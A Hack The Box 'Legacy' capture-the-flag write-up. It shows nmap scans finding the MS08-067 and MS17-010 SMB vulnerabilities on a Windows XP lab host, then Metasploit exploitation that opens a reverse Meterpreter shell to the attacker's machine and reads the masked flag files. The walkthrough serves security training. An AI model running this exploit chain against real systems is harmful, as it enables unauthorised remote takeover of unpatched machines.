HTB Legacy

$sudo nmap -A -T4 -p- 10.10.10.4

Starting Nmap 7.80 ( [https://nmap.org](https://nmap.org/) ) at 2020-06-19 18:00 CEST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.53% done; ETC: 18:04 (0:04:18 remaining)
Stats: 0:02:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.27% done; ETC: 18:02 (0:00:00 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.064s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|*clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
|nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ea:cf (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
| System time: 2020-06-24T20:59:26+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|* message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 68.62 ms 10.10.14.1
2 68.91 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 152.78 seconds

Open ports detected:

  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 445/tcp open microsoft-ds Windows XP microsoft-ds
  • 3389/tcp closed ms-wbt-server

Based on the detected ports, we have SMB here.

$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which smb version do we have?
Not sure yet…

$nmap -p139 --script smb-protocols 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 19:59 CEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 50.91 seconds

$nmap -p445 --script smb-protocols 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 20:01 CEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]

Nmap done: 1 IP address (1 host up) scanned in 50.63 seconds

According to this results, we have SMBv1  🙂

$nmap -p445 --script vuln 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:36 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 48.83 seconds

 $nmap -p139 --script vuln 10.10.10.4 -Pn

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:38 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.044s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 39.55 seconds

msf5 > search CVE-2008-4250

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.4:1031) at 2020-06-20 10:51:31 +0200

meterpreter >

meterpreter > dir

Listing: C:\
============

Mode                 Size               Type  Last modified                    Name
----                 ----               ----  -------------                    ----
100777/rwxrwxrwx     0                  fil   2017-03-16 06:30:44 +0100        AUTOEXEC.BAT
100666/rw-rw-rw-     0                  fil   2017-03-16 06:30:44 +0100        CONFIG.SYS
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:29 +0100        Documents and Settings
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        IO.SYS
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        MSDOS.SYS
100555/r-xr-xr-x     47564              fil   2008-04-13 22:13:04 +0200        NTDETECT.COM
40555/r-xr-xr-x      0                  dir   2017-03-16 06:20:57 +0100        Program Files
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:30 +0100        System Volume Information
40777/rwxrwxrwx      0                  dir   2017-03-16 06:18:34 +0100        WINDOWS
100666/rw-rw-rw-     211                fil   2017-03-16 06:20:02 +0100        boot.ini
100444/r--r--r--     250048             fil   2008-04-14 00:01:44 +0200        ntldr
236001544/r-xr--r--  51787753582526447  fif   1650092888-02-20 02:25:20 +0100  pagefile.sys

meterpreter > cd Documents\ and\ Settings
meterpreter > dir

Listing: C:\Documents and Settings
==================================


Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 07:07:20 +0100  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:52 +0100  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:42 +0100  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 06:33:41 +0100  john

meterpreter > cd Administrator
meterpreter > dir

Listing: C:\Documents and Settings\Administrator
================================================


Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 07:07:20 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 07:07:20 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 07:07:21 +0100  ntuser.ini

meterpreter > cd Desktop
meterpreter > dir

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================


Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:18:19 +0100  root.txt

meterpreter > cat root.txt

9934XXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd john
meterpreter >ls

Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 06:33:41 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 06:33:41 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 06:33:42 +0100  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls

Listing: C:\Documents and Settings\john\Desktop
===============================================


Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:19:32 +0100  user.txt

meterpreter > cat user.txt

e69aXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *